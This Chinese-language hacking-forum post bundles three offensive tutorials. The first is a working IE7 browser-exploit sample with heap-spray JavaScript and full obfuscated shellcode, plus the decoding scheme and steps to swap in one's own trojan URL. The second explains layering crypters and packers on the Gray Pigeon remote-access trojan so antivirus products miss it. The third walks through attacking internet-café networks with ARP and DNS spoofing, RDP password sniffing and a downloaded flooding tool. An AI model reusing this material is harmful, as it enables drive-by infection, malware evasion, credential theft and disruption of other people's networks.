2017最新ie0day样本网马修改~

最近流行的最新网马IE70day+shellcode+exe样本已经出来了,刚刚看到,感觉蛮新奇的,毕竟现在还是样本,想把它改成自己的马还得费一番功夫。目前的网马一般改下shellcode就ok了。不过听别人说,如果单纯改shellcode的话,ie会出现崩溃,所以要找到适合得shellcode还是得费一番功夫,不过,有现成的,不用不是浪费么?废话不多说,分析开始。

网马的样本如下更多关注www.hackerschina.org

复制内容到剪贴板

代码:

if(navigator.userAgent.toLowerCase().indexOf(“msie 7”)==-1)location.replace(“about:blank”);

function sleep(milliseconds)

{

var start=new Date().getTime();

for(var i=0;i<1e7;i++)

{if((new Date().getTime()-start)>milliseconds)

{break}

}

}

function spray(sc)

{

var infect=unescape(sc.replace(/dadong/g,”\x25\x75″));

var heapBlockSize=0x100000;

var payLoadSize=infect.length*2;

var szlong=heapBlockSize-(payLoadSize+0x038);

var retVal=unescape(“%u0a0a%u0a0a”);

retVal=getSampleValue(retVal,szlong);

aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

zzchuck=new Array();

for(i=0;i<aaablk;i++){zzchuck=retval+infect}< p=””>

}

function getSampleValue(retVal,szlong)

{

while(retVal.length*2<szlong)< p=””>

{retVal+=retVal}

retVal=retVal.substring(0,szlong/2);

return retVal

}

var a1=”dadong”;

spray(a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031Cdadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61Fdadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39ABdadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AAdadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDEdadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDEdadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7FdadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7Fdadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CAdadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DEdadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3DdadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017BdadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1Fdadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021″);

sleep(3000);

nav=navigator.userAgent.toLowerCase();

if(navigator.appVersion.indexOf(‘MSIE’)!=-1)

{

version=parseFloat(navigator.appVersion.split(‘MSIE’)[1])

}

if(version==7)

{

w2k3=((nav.indexOf(‘windows nt 5.2’)!=-1)||(nav.indexOf(‘windows 2003’)!=-1));

wxp=((nav.indexOf(‘windows nt 5.1’)!=-1)||(nav.indexOf(‘windows xp’)!=-1));

if(wxp||w2k3)document.write(‘]]>’);

var i=1;while(i<=10)

{

window.status=” “;i++}

}

   

首先,大家肯定会查找shellcode在哪里,这个样本得shellcode刚刚看起来貌似和其他的马有些不同,是

a1+”9090″+a1+”dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031

的形式,其实明白人一看就出来,这样得加密其实很容易解,解密函数就是sc.replace(/dadong/g,”\x25\x75″)了。

解开之后,shellcode就露出庐山真面目了

复制内容到剪贴板

代码:

u9090%u%u9090%u9090%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021有了shellcode,下一步就是抄家伙分析了,首先把shellcode转换成exe文件,用OD载入

单步跟踪,到如下位置的时候注意了

如图所示

 

XOR BYTE PIR DS:[EAX],21

这个是负责shellcode解密得函数了,由于shellcode用的是异或加密,并且从这里可以看出密钥是21,这就好办啦~~~

我们把shellcode的 复制内容到剪贴板 代码:%u5549%u5155%u0E1B%u560E%u5656%u430F%u4840%u444A%u0F42%u4F42%u450E%u564E%u0E4F%u4E4A%u440F%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021

 

知道了以上这些原理,把这个网马改成自己得马就简单了!

我们只要把自己马的地址用21异或运算,并且转换成unicode替换原来的那些,并且按照原理得方法加密unicode,网马的改造就算完成了!!!

知道了道理,写生成器也就不是什么难事了~~~

中国骇客云教大家如何免杀

免杀,一个在黑客界永不过时的话题。从木马和杀毒软件的第一次交锋开始就始终没有中断过,黑客程序开发者和杀毒软件的技术人员的始终在较量着。面对强大的杀毒软件,病毒的免杀就显的尤为重要。免杀的方式基本分为三种:修改特征码、添加花指令和壳,最后一次,危险漫步就来和大家谈谈加壳这种最常见的免杀方式。

有些动植物长着坚硬的外壳,因为它们都着脆弱的身体,需要用坚硬的外壳来保护自己。根据这一理论,一种叫壳的程序出现了。壳诞生的初衷是为了保护自己的程序不被破解和修改,病毒作为一种特殊的程序,壳同样也可以用于病毒的保护。通过这一现象,壳的用途出现了一个翻天覆地的转变。现在提到壳,大家都会想到病毒的免杀。

一般来说,壳分为两种:加密壳和压缩壳。加密壳主要的作用是对程序进行加密,但加密后程序体积会变大。压缩壳主要用于对程序的压缩,能够减小程序的体积。另外,还有一些特殊的壳既可以加密,同时也可以压缩。

加壳不失为一种不错的免杀方式,但随着杀毒软件的普及和病毒库的日益扩大,越来越多的加壳程序被列入病毒的行列。那么我们还能使用这些壳为病毒免杀吗?YES!但我们要稍微动动手脚了。

如果说单一的添加壳,用不了多久就会被杀,人品不行的一下就被主动防御和云查杀给秒了…

我们可以把一些壳混合起来为程序加壳,也就是题目提到的复合加壳,这样也可以起到免杀的效测试才行。

W(%EL[ZASU3CU`%{N[J23QV.png

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。但要注意的是:尽量选择一些不常见的加壳程序,加壳要保证一定的数量,不能只加一两个壳。

而且加壳后不等于100%免杀,还要靠我们不断分析测试才行。中国骇客云官方网站hackerschina.org

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是

RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。

简单介绍一下使用方法,左边是选择要加壳的文件,右边是设置输出文件位置。把下面所有的选项全部选上,这些选项的意思是:反编译、反沙盘等等,我们选上就可以了。然后点击“Crypt File”就为灰鸽子加上了加密壳。

现在还不能添加压缩壳,因为每个壳的兼容性都不一样,我们必须进行资源释放处理。下面我们要使用到“FreeRes”。释放资源后选择“功能”中的“建立可编辑资源”对文件进行资源重建。

接下来我们就用到压缩壳,我选用的是“蚂蚁加壳工具和Mini_pack”,因为他们都是压缩壳,经过我测试,这两个壳在压缩时不需要进行资源释放处理。勾好配置后,找到服务端后进行

二次加壳。压缩完毕,用加壳后的灰鸽子过一下瑞星、卡巴和360,都没有报毒。

中国骇客云教你如何攻击网吧(压力测试)我们只上传工具。

尊敬的用户大家好,好长时间没有发布教程了。因为前些时候在网吧玩儿,突发奇想的想攻击网吧进行压力测试,【lol网吧】带宽不足是所有网吧的通病。
首先一些网吧进行了安全组建以及安全模块禁用一些arp嗅探等工具。因为缺少相应的dll,所以一些工具是不能用的,在这里我们提供一些基本的补丁,通杀所有网吧32位64位的dll。下载地址复制一下进行浏览器粘贴。
点我进行下载    cain的内网渗透工具,因为下载好以后根据网吧机器是32或者64进行dll的补丁安装。
以下讲解了cain的使用教程,如果大家在使用中不会请看完本文即可进行深度学习。那天我们攻击网吧的截图和照片没有了(怕网管查到所以没有进行拍照不好意思大家。)
这一步不会可以直接进行跳过看下一步:


内网渗透的一些基本工具用法:
Cain & Abel 是由Oxid.it开发的一个针对Microsoft操作系统的免费口令恢复工具。号称穷人使用的L0phtcrack。它的功能十分强大,可以网络嗅探,网络欺骗,破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议,甚至还可以监听内网中他人使用VOIP拨打电话。

Abel 是后台服务程序,一般不会用到,我们重点来介绍Cain的使用。

Cain安装:首先我们需要安装Winpcap驱动,

cain内网嗅探工具使用教程 - yes_root - yes_root

一路next便可以安装成功

然后我们就可以使用Cain了,让我们打开传说中的Cain,界面十分简单明了,

cain内网嗅探工具使用教程 - yes_root - yes_root

但是它的功能可就不简单了。

Cain使用:

一、读取缓存密码:切换到“受保护的缓存口令”标签,点上面的那个加号

cain内网嗅探工具使用教程 - yes_root - yes_root

缓存在IE里的密码全都显示出来了。

二、查看网络状况

切换到“网络” 标签,可以清楚的看到当前网络的结构,我还看到内网其他的机器的共享目录,用户和服务,通过上图,我们清楚的看到Smm-DB1开启了IPC$默认共享连接和其他盘隐藏共享。

三、ARP欺骗与嗅探

ARP欺骗的原理是操纵两台主机的ARP缓存表,以改变它们之间的正常通信方向,这种通信注入的结果就是ARP欺骗攻击。ARP欺骗和嗅探是Cain我们用的最多的功能了,切换到“嗅探”标签

cain内网嗅探工具使用教程 - yes_root - yes_root

在这里可以清晰的看到内网中各个机器的IP和MAC地址。

我们首先要对Cain进行配置,先点最单击最上面的“配置”

cain内网嗅探工具使用教程 - yes_root - yes_root

在“嗅探器”中选择要嗅探的网卡,在“ARP(Arp Poison Routing)”中可以伪造IP地址和MAC地址进行欺骗,避免被网管发现

cain内网嗅探工具使用教程 - yes_root - yes_root

在“过滤与端口”中可以设置过滤器,

cain内网嗅探工具使用教程 - yes_root - yes_root

可以根据自己的需要选择过滤的端口,如嗅探远程桌面密码的话,就钩选RDP 3389端口。

小提示:比如我要嗅探上面的61.132.223.10机器,第二个网卡显示我的ip地址为61.132.223.26,和目标机器是同一内网的,就使用第二个的网卡欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

单击网卡的那个标志开始嗅探,旁边的放射性标志则是ARP欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

cain内网嗅探工具使用教程 - yes_root - yes_root

  嗅探了N久之后,点击下面的 “截获密码”, 嗅探所得到的密码会按分类呈现在大家面前,包括http、ftp、VNC、SMTP、ICQ等密码。如果目标主机使用voip电话的话,还可以获得他使用voip电话的录音(恐怖吧),如图

cain内网嗅探工具使用教程 - yes_root - yes_root

  cain内网嗅探工具使用教程 - yes_root - yes_root  下面我们来进行Arp欺骗,点击下面的“ARP”标签, 

cain内网嗅探工具使用教程 - yes_root - yes_root

 在右边的空白处单击,然后点上面的“加号”,出现“新建ARP欺骗”对话框,在左边选网关,右边选择被欺骗的IP。

这里要注意的是,你的机器性能比网关差的话,会引起被欺骗机器变慢。

1.DNS欺骗:

在“DNS欺骗”中填入请求的DNS名称和响应包的IP地址,

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,当目标地址访问www.hao123.com的时候就自动跳转到Www.google.cn的网站上面,其中的“#resp. 欺骗”就是目标主机被欺骗的次数。

这样对于目标机器进行挂马也不失为一种绝妙的方法。点上面的放射性标志开始Arp欺骗,

小提示:网关IP可以在命令行下输入ipconfig获得

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,网关IP为61.132.223.4

2.远程桌面欺骗:

Cain能够实行中间人攻击(Man-In-The-Middle)远程计算机的终端服务协议(Remote Desktop Protocol RDP)进行截获和解密工作。也就是截获目标主机的3389登陆密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

在“ARP-RDP”里已经得到了3个数据包。右击右边得到的数据包,选择“查看”,

cain内网嗅探工具使用教程 - yes_root - yes_root

我的运气比较好,获得了目标主机登陆3389的用户和密码,如图,用户名为“administrator”密码为“asdf1234”。

小技巧:在肉鸡上对密码进行嗅探的时候,可以按Alt +Delete对界面进行隐藏,按Alt + Page Down隐藏都任务栏,按Alt +Page up呼出界面。这个技巧在内网渗透的时候非常有用!

四、密码的破解

Cain还具有强大的破解功能,可以破解md5,md4,pwl,mssql等加密的密文,我这里示范如何使用Cain破解md5密文。

cain内网嗅探工具使用教程 - yes_root - yes_root

切换到“破解器”标签,在右边空白处单击,按上面的加号,输入我们要解密的32位密文

cain内网嗅探工具使用教程 - yes_root - yes_root

右击要破解的密文,选择“暴力破解”,选择口令长度和密码范围,我这儿选择的是5到6位纯数字密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

按“开始”进行破解

cain内网嗅探工具使用教程 - yes_root - yes_root

一会儿工夫,破解出的密码就出现在我们面前了,哈哈,密码是123456。除了暴力破解以外,你还可以使用通过字典破解和通过rainbow表进行破解。

其他还有一些常用密码的读取可以参照下图

cain内网嗅探工具使用教程 - yes_root - yes_root

使用十分简单,大家自己研究下就行了,密文计算器的效果如图:

cain内网嗅探工具使用教程 - yes_root - yes_root

可以对密文进行md2,md5,lm,nt等方式进行加密

五、追踪路由

切换到“追踪路由”标签,在目标主机中填入目标主机的ip或者域名,我这填www.hackerxfiles.net

cain内网嗅探工具使用教程 - yes_root - yes_root

选择协议和端口,点“开始”,一杯咖啡过后,就可以清晰的看到访问黑X  BBS所经过的所有服务器IP、访问所需的时间和主机名。

另外,Cain还具有“LSA分析”和“嗅探无线网络”等功能,这些功能我们不经常用到,感兴趣的朋友可以自行研究。最新版本cain4.92已经加入vista支持,但是“读取读取缓存密码”功能不是很稳定,如果要读取读取缓存密码的话请使用以前的版本。最后要说一句:Cain的确是一款绝佳的黑界利器,威力无穷,请各位小黑们谨慎使用。


第二步:下载网络超级邻居和p2p网络终结者。
网络超级邻居可以检测内网所有上线主机与共享主机,并且可以进行开放端口检测与服务器主机的检测,具体参考我们的网络超级邻居的使用方法如下:
打开网络超级邻居直接嗅探整个网吧的上线主机,扫描开放端口,135.3389.1433等端口…搜索开放端口的在线主机,共享本机到所有开放主机文件等。
p2p网络终结者可以在百度任意下载,如果缺少部分dll可以添加cain的dll进行安装和使用。
因为网络超级邻居和p2p网络终结者cain的共同性,都可以进行局域网扫描,所以这个就得看个人经验找到相应的服务器主机和安全模块的服务器主机地址了。这里可以使用三个进行经验判断和扫描结果。以后有图了给大家补下。
网络超级邻居下载地址:http://www.crsky.com/soft/2700.html

p2p网络终结者下载地址:http://www.cr173.com/soft/1953.html
因为
这里个软件百度随便一个下载站点都可以下载到,所以如果上面两个软件失效了,请百度一下吧。


第三步:蜗牛攻击器终极版下载地址:https://binghesoft.ctfile.com/file/117068576    这个如果不能使用,百度一下(蜗牛攻击器终极版)|


第四步:打开蜗牛攻击器,p2p网络终结者,网络超级邻居。
